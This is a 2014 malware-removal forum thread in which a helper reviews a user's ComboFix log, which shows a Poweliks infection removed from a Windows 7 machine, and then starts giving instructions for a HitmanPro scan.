Posted 28 August 2014 - 04:36 PM

Thanks for letting me know.
The FRST log clearly shows that you're infected irrespective of what Malwarebytes and ESET say. :)
Just continue with Combofix as advised in my last post.

Edited by aharonov, 28 August 2014 - 04:36 PM.


#7 LynnBR

LynnBR
  • Topic Starter

  • Members
  • 104 posts
  • OFFLINE
  •  
  • Gender:Female
  • Local time:01:23 AM

Posted 28 August 2014 - 05:00 PM

Aharonov, here is ComboFix log. And yes, after the website blocks I assumed there was a nasty in here.

 

ComboFix 14-08-28.01 - mike 08/28/2014  14:36:59.1.8 - x64
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.8146.6481 [GMT -7:00]
Running from: c:\users\mike\Desktop\ComboFix.exe
AV: ESET Endpoint Antivirus 5.0 *Disabled/Updated* {77DEAFED-8149-104B-25A1-21771CA47CD1}
SP: ESET Endpoint Antivirus 5.0 *Disabled/Updated* {CCBF4E09-A773-1FC5-1F11-1A056723366C}
SP: Windows Defender *Enabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
C:\Install.exe
c:\users\mike\GoToAssistDownloadHelper.exe
c:\users\networkadmin\GoToAssistDownloadHelper.exe
c:\windows\SysWow64\~GLH02ea.TMP
c:\windows\SysWow64\~GLH02eb.TMP
c:\windows\SysWow64\~GLH02ec.TMP
c:\windows\SysWow64\~GLH02ed.TMP
c:\windows\SysWow64\~GLH02ee.TMP
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct:
.
HKEY_CLASSES_ROOT\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
    (Default)    REG_SZ    Thumbnail Cache Class Factory for Out of Proc Server
    AppID    REG_SZ    {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32
    (Default)    REG_SZ    c:\windows\system32\thumbcache.dll
    ThreadingModel    REG_SZ    Apartment
.
.
(((((((((((((((((((((((((   Files Created from 2014-07-28 to 2014-08-28  )))))))))))))))))))))))))))))))
.
.
2014-08-28 21:48 . 2014-08-28 21:48 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-08-28 21:48 . 2014-08-28 21:48 -------- d-----w- c:\users\User1\AppData\Local\temp
2014-08-28 21:48 . 2014-08-28 21:48 -------- d-----w- c:\users\networkadmin\AppData\Local\temp
2014-08-28 21:48 . 2014-08-28 21:48 -------- d-----w- c:\users\lynn\AppData\Local\temp
2014-08-28 21:18 . 2014-08-28 21:20 -------- d-----w- C:\FRST
2014-08-27 23:25 . 2014-08-27 23:25 -------- d-----w- c:\programdata\ATI
2014-08-27 23:23 . 2014-08-27 23:23 -------- d-----w- c:\program files\AMD
2014-08-27 21:55 . 2014-08-27 21:55 -------- d-----w- c:\users\networkadmin\AppData\Roaming\library_dir
2014-08-27 21:54 . 2014-08-28 20:51 -------- d-----w- c:\users\networkadmin\AppData\Roaming\Raptr
2014-08-27 21:54 . 2014-08-27 21:55 -------- d-----w- c:\program files (x86)\Raptr
2014-08-27 21:54 . 2014-08-27 21:54 -------- d-----w- c:\programdata\AMD
2014-08-27 21:54 . 2014-08-27 21:54 -------- d-----w- c:\program files (x86)\AMD AVT
2014-08-27 21:54 . 2014-08-27 21:54 -------- d-----w- c:\program files (x86)\Common Files\ATI Technologies
2014-08-27 21:54 . 2014-08-27 21:54 -------- d-----w- c:\program files\Common Files\ATI Technologies
2014-08-27 21:54 . 2014-08-27 21:54 -------- d-----w- c:\program files (x86)\ATI Technologies
2014-08-27 21:53 . 2014-08-27 21:54 -------- d-----w- c:\programdata\Package Cache
2014-08-27 21:53 . 2014-08-27 21:54 -------- d-----w- c:\program files\ATI Technologies
2014-08-27 21:52 . 2014-08-27 21:52 -------- d-----w- C:\AMD
2014-08-27 20:33 . 2014-08-27 20:33 -------- d-----w- c:\users\networkadmin\AppData\Local\Adobe
2014-08-27 20:29 . 2014-08-27 20:29 -------- d-----w- c:\users\networkadmin\AppData\Local\Dell
2014-08-27 20:06 . 2014-08-27 20:06 -------- d-----w- c:\users\networkadmin\AppData\Roaming\Dell
2014-08-27 20:06 . 2014-08-27 20:06 -------- d-----w- c:\programdata\PCDr
2014-08-27 20:06 . 2014-08-27 20:06 -------- d-----w- c:\programdata\PC-Doctor for Windows
2014-08-27 20:06 . 2014-08-27 20:06 -------- d-----w- c:\program files\Dell Support Center
2014-08-27 20:06 . 2014-08-27 20:06 -------- d-----w- c:\program files\My Dell
2014-08-27 20:03 . 2014-08-27 20:03 -------- d-----w- c:\users\networkadmin\AppData\Roaming\PCDr
2014-08-27 20:03 . 2014-08-27 20:20 -------- d-----w- C:\temp
2014-08-27 18:50 . 2014-08-27 19:07 122584 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-08-27 18:50 . 2014-08-27 18:50 -------- d-----w- c:\program files (x86)\Malwarebytes Anti-Malware
2014-08-27 18:50 . 2014-08-27 18:50 -------- d-----w- c:\programdata\Malwarebytes
2014-08-27 18:50 . 2014-05-12 14:26 63704 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-08-27 18:50 . 2014-05-12 14:26 91352 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-08-27 18:50 . 2014-05-12 14:25 25816 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-08-27 18:49 . 2014-08-27 18:49 -------- d-----w- c:\users\networkadmin\AppData\Local\Programs
2014-08-27 18:31 . 2014-08-27 18:31 -------- d-----w- c:\users\networkadmin\AppData\Roaming\Toshiba
2014-08-27 18:07 . 2014-08-27 18:07 -------- d-----w- c:\users\mike\AppData\Roaming\Toshiba
2014-08-21 16:36 . 2014-08-21 16:37 -------- d-----w- c:\programdata\Toshiba
2014-08-21 16:36 . 2013-06-04 13:59 41472 ----a-w- c:\windows\SysWow64\agphlink.tsp
2014-08-21 16:36 . 2013-06-04 13:58 220672 ----a-w- c:\windows\SysWow64\intrtspi.tsp
2014-08-21 16:35 . 2014-08-21 16:35 -------- d-----w- c:\program files (x86)\Jabra
2014-08-21 16:35 . 2014-08-21 16:35 -------- d-----w- c:\program files (x86)\Plantronics
2014-08-21 16:35 . 2013-10-16 16:08 81920 ----a-w- c:\windows\SysWow64\DumpWin.ocx
2014-08-21 16:35 . 2013-10-16 16:08 69632 ----a-w- c:\windows\SysWow64\playrec.ocx
2014-08-21 16:35 . 2013-10-16 16:08 61440 ----a-w- c:\windows\SysWow64\CTSMail.dll
2014-08-21 16:35 . 2013-10-16 16:08 40960 ----a-w- c:\windows\SysWow64\DDEWrap.ocx
2014-08-21 16:35 . 2013-10-16 16:08 131155 ----a-w- c:\windows\SysWow64\gtapiocx.ocx
2014-08-21 16:35 . 2013-06-04 14:16 127037 ----a-w- c:\windows\SysWow64\eClient.ocx
2014-08-21 16:35 . 2013-06-04 14:16 53306 ----a-w- c:\windows\SysWow64\sock.ocx
2014-08-21 16:35 . 2009-11-05 15:20 626688 ----a-w- c:\windows\SysWow64\msvcr80.dll
2014-08-21 16:35 . 2014-08-21 16:35 -------- d-----w- c:\program files (x86)\Toshiba
2014-08-21 16:35 . 2006-03-13 21:28 368912 ----a-w- c:\windows\SysWow64\vbar332.dll
2014-08-21 16:32 . 2014-08-21 16:32 -------- d-----w- c:\users\teleco3
2014-08-20 09:01 . 2014-08-20 09:01 75888 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{1BDBBEDF-B4EB-4940-9A20-590E40F77114}\offreg.dll
2014-08-14 16:12 . 2014-08-14 16:12 -------- d-----w- c:\program files\ESET
2014-08-06 10:04 . 2014-03-25 02:43 14175744 ----a-w- c:\windows\system32\shell32.dll
2014-08-06 10:04 . 2014-06-03 10:02 1389568 ----a-w- c:\program files\Windows Journal\JNWDRV.dll
2014-08-06 10:04 . 2014-06-03 10:02 1380864 ----a-w- c:\program files\Windows Journal\JNTFiltr.dll
2014-08-06 10:04 . 2014-06-03 09:29 936960 ----a-w- c:\program files (x86)\Common Files\Microsoft Shared\ink\journal.dll
2014-08-06 10:04 . 2014-06-03 10:02 1719296 ----a-w- c:\program files\Windows Journal\NBDoc.DLL
2014-08-06 10:04 . 2014-06-03 10:02 1354240 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\journal.dll
2014-08-06 10:03 . 2014-06-18 02:19 449024 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\tabskb.dll
2014-08-06 10:03 . 2014-06-18 02:19 110592 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\TipBand.dll
2014-08-06 10:03 . 2014-06-18 02:18 224768 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\TabTip.exe
2014-08-06 10:03 . 2014-06-18 02:17 544768 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\TipRes.dll
2014-08-06 10:03 . 2014-06-18 01:51 10240 ----a-w- c:\program files (x86)\Common Files\Microsoft Shared\ink\TabTip32.exe
2014-08-06 10:03 . 2014-06-18 02:19 503296 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\tiptsf.dll
2014-08-06 10:03 . 2014-06-18 02:19 1247232 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\tipskins.dll
2014-08-06 10:03 . 2014-06-18 02:18 692736 ----a-w- c:\windows\system32\osk.exe
2014-08-06 10:03 . 2014-06-18 01:52 348672 ----a-w- c:\program files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll
2014-08-06 10:03 . 2014-06-18 01:51 646144 ----a-w- c:\windows\SysWow64\osk.exe
2014-08-06 10:03 . 2014-06-18 01:10 3157504 ----a-w- c:\windows\system32\win32k.sys
2014-08-06 10:02 . 2014-06-06 10:10 624128 ----a-w- c:\windows\system32\qedit.dll
2014-08-06 10:02 . 2014-06-06 09:44 509440 ----a-w- c:\windows\SysWow64\qedit.dll
2014-08-06 10:02 . 2014-05-30 06:45 497152 ----a-w- c:\windows\system32\drivers\afd.sys
2014-08-06 10:00 . 2014-06-07 02:51 1392128 ----a-w- c:\windows\system32\wininet.dll
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-08-28 20:50 . 2010-06-24 17:33 23256 ----a-w- c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
2014-08-27 20:00 . 2013-02-12 03:07 71344 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-08-27 20:00 . 2013-02-12 03:07 699568 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Spotify"="c:\users\mike\AppData\Roaming\Spotify\Spotify.exe" [2014-08-27 6621752]
"Spotify Web Helper"="c:\users\mike\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe" [2014-08-27 1245752]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"IAStorIcon"="c:\program files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIconLaunch.exe" [2012-06-07 56128]
"USB3MON"="c:\program files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe" [2012-10-16 291648]
"Adobe ARM"="c:\program files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-11-21 959904]
"Adobe Acrobat Speed Launcher"="c:\program files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe" [2014-05-08 41336]
"Acrobat Assistant 8.0"="c:\program files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe" [2014-05-08 840568]
"StartCCC"="c:\program files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe" [2014-04-18 767200]
.
c:\users\mike\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Reminder.lnk - g:\checkin\Chklogin.exe [2011-3-29 1056768]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Call Manager.lnk - c:\program files (x86)\Toshiba\CallManager\CallManager.exe [2014-8-21 2098688]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
"DisableCAD"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\drivers32]
"aux1"=wdmaud.drv
.
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R3 dmvsc;dmvsc;c:\windows\system32\drivers\dmvsc.sys;c:\windows\SYSNATIVE\drivers\dmvsc.sys [x]
R3 ESHASRV;ESET SHA Service;c:\program files\ESET\ESET NOD32 Antivirus\EShaSrv.exe;c:\program files\ESET\ESET NOD32 Antivirus\EShaSrv.exe [x]
R3 netvsc;netvsc;c:\windows\system32\DRIVERS\netvsc60.sys;c:\windows\SYSNATIVE\DRIVERS\netvsc60.sys [x]
R3 SynthVid;SynthVid;c:\windows\system32\DRIVERS\VMBusVideoM.sys;c:\windows\SYSNATIVE\DRIVERS\VMBusVideoM.sys [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys;c:\windows\SYSNATIVE\drivers\TsUsbGD.sys [x]
R3 WvPCR;WvPCR;c:\program files\Dell\Dell Data Protection\Access\Advanced\Wave\Common\WvPCR.exe;c:\program files\Dell\Dell Data Protection\Access\Advanced\Wave\Common\WvPCR.exe [x]
R4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\Windows Live\Mesh\wlcrasvc.exe;c:\program files\Windows Live\Mesh\wlcrasvc.exe [x]
S0 iusb3hcs;Intel® USB 3.0 Host Controller Switch Driver;c:\windows\system32\DRIVERS\iusb3hcs.sys;c:\windows\SYSNATIVE\DRIVERS\iusb3hcs.sys [x]
S1 eamonm;eamonm;c:\windows\system32\DRIVERS\eamonm.sys;c:\windows\SYSNATIVE\DRIVERS\eamonm.sys [x]
S1 ehdrv;ehdrv;c:\windows\system32\DRIVERS\ehdrv.sys;c:\windows\SYSNATIVE\DRIVERS\ehdrv.sys [x]
S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x]
S2 atashost;WebEx Service Host for Support Center;c:\windows\SysWOW64\atashost.exe;c:\windows\SysWOW64\atashost.exe [x]
S2 CmRegService;TSD Call Manager Configuration;c:\program files (x86)\Toshiba\CallManager\CmRegService.exe;c:\program files (x86)\Toshiba\CallManager\CmRegService.exe [x]
S2 ekrn;ESET Service;c:\program files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe;c:\program files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [x]
S2 EmbassyService;EmbassyService;c:\program files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe;c:\program files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe [x]
S2 epfwwfpr;epfwwfpr;c:\windows\system32\DRIVERS\epfwwfpr.sys;c:\windows\SYSNATIVE\DRIVERS\epfwwfpr.sys [x]
S2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;c:\program files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe;c:\program files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [x]
S2 Intel® Capability Licensing Service Interface;Intel® Capability Licensing Service Interface;c:\program files\Intel\iCLS Client\HeciServer.exe;c:\program files\Intel\iCLS Client\HeciServer.exe [x]
S2 Intel® PROSet Monitoring Service;Intel® PROSet Monitoring Service;c:\windows\system32\IProsetMonitor.exe;c:\windows\SYSNATIVE\IProsetMonitor.exe [x]
S2 jhi_service;Intel® Dynamic Application Loader Host Interface Service;c:\program files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe;c:\program files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [x]
S2 UNS;Intel® Management and Security Application User Notification Service;c:\program files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe;c:\program files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe [x]
S2 Wave Authentication Manager Service;Wave Authentication Manager Service;c:\program files\Dell\Dell Data Protection\Access\Advanced\Wave\Authentication Manager\WaveAMService.exe;c:\program files\Dell\Dell Data Protection\Access\Advanced\Wave\Authentication Manager\WaveAMService.exe [x]
S3 AtiHDAudioService;AMD Function Driver for HD Audio Service;c:\windows\system32\drivers\AtihdW76.sys;c:\windows\SYSNATIVE\drivers\AtihdW76.sys [x]
S3 iusb3hub;Intel® USB 3.0 Hub Driver;c:\windows\system32\DRIVERS\iusb3hub.sys;c:\windows\SYSNATIVE\DRIVERS\iusb3hub.sys [x]
S3 iusb3xhc;Intel® USB 3.0 eXtensible Host Controller Driver;c:\windows\system32\DRIVERS\iusb3xhc.sys;c:\windows\SYSNATIVE\DRIVERS\iusb3xhc.sys [x]
.
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - WS2IFSL
.
Contents of the 'Scheduled Tasks' folder
.
2014-08-28 c:\windows\Tasks\TSOLnkUpdAlertTask.job
- c:\program files (x86)\Trade Service\Trade Service Online Link Update Manager\TSOLnkUpdAlert.exe [2013-10-08 12:57]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\EnabledUnlockedFDEIconOverlay]
@="{30D3C2AF-9709-4D05-9CF4-13335F3C1E4A}"
[HKEY_CLASSES_ROOT\CLSID\{30D3C2AF-9709-4D05-9CF4-13335F3C1E4A}]
2011-12-08 16:45 139128 ----a-w- c:\program files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\UninitializedFdeIconOverlay]
@="{CF08DA3E-C97D-4891-A66B-E39B28DD270F}"
[HKEY_CLASSES_ROOT\CLSID\{CF08DA3E-C97D-4891-A66B-E39B28DD270F}]
2011-12-08 16:45 139128 ----a-w- c:\program files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"="c:\program files\Realtek\Audio\HDA\RtDCpl64.exe" [2011-07-21 2907240]
"TdmNotify"="c:\program files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmNotify.exe" [2011-12-08 381296]
"egui"="c:\program files\ESET\ESET NOD32 Antivirus\egui.exe" [2013-02-14 4144944]
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
mLocal Page = c:\windows\SysWOW64\blank.htm
IE: Append Link Target to Existing PDF - c:\program files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
IE: Append to Existing PDF - c:\program files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert Link Target to Adobe PDF - c:\program files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
IE: Convert to Adobe PDF - c:\program files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIECapture.html
IE: E&xport to Microsoft Excel - c:\progra~2\MICROS~3\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\progra~2\MICROS~3\Office14\ONBttnIE.dll/105
TCP: DhcpNameServer = 10.0.0.2
.
- - - - ORPHANS REMOVED - - - -
.
Toolbar-Locked - (no file)
Wow6432Node-HKLM-Run-<NO NAME> - (no file)
Toolbar-Locked - (no file)
AddRemove-QuoteExpress Sheetmetal Workstation - c:\users\Public\Quote\UNWISE.EXE
.
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_14_0_0_176_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_14_0_0_176_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_14_0_0_176_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_14_0_0_176_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_176.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.14"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_176.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_176.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_176.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\Common\Smart Tag\Actions\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}]
@Denied: (A) (Everyone)
"Solution"="{15727DE6-F92D-4E46-ACB4-0E2C58B31A18}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3]
@Denied: (A) (Everyone)
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3\0]
"Key"="ActionsPane3"
"Location"="c:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\ActionsPane3.xsd"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
------------------------ Other Running Processes ------------------------
.
c:\program files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
c:\program files (x86)\Common Files\SafeNet Sentinel\Sentinel Protection Server\WinNT\spnsrvnt.exe
c:\program files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
c:\program files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
.
**************************************************************************
.
Completion time: 2014-08-28  14:57:26 - machine was rebooted
ComboFix-quarantined-files.txt  2014-08-28 21:57
.
Pre-Run: 418,595,016,704 bytes free
Post-Run: 433,461,686,272 bytes free
.
- - End Of File - - E605C64AF756CB28FD78C1F840BC8C59
 



#8 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:23 AM

Posted 28 August 2014 - 05:05 PM

Looking better already. :)
How is your computer running now? What problems and symptoms are still present?


Step 1

Don't remove on your own anything that Hitman Pro detects!
This scanner, as it is a really good for checking, has been known for deleting files instead of curing them, which in some cases may render the machine unbootable.
Any removals will be done manually after careful analysis of the scan results!


Please download hitmanpro_32.pngHitmanPro 32-bit / HitmanPro 64-bit by SurfRight and save it to your desktop.
Temporary disable your AntiVirus and AntiSpyware protection - instructions here.
  • Right-click onhitmanpro.pngicon and select admin.PNGRun as Administrator to start the tool.
  • If the program won't run please run it while holding down the left CTRL key until it's loaded!
  • Click on the Next button (1). You must agree with the terms of EULA (2 - if asked).
  • Check the box beside "No, I only want to perform a one-time scan to check this computer" and click on the Next button. (3)
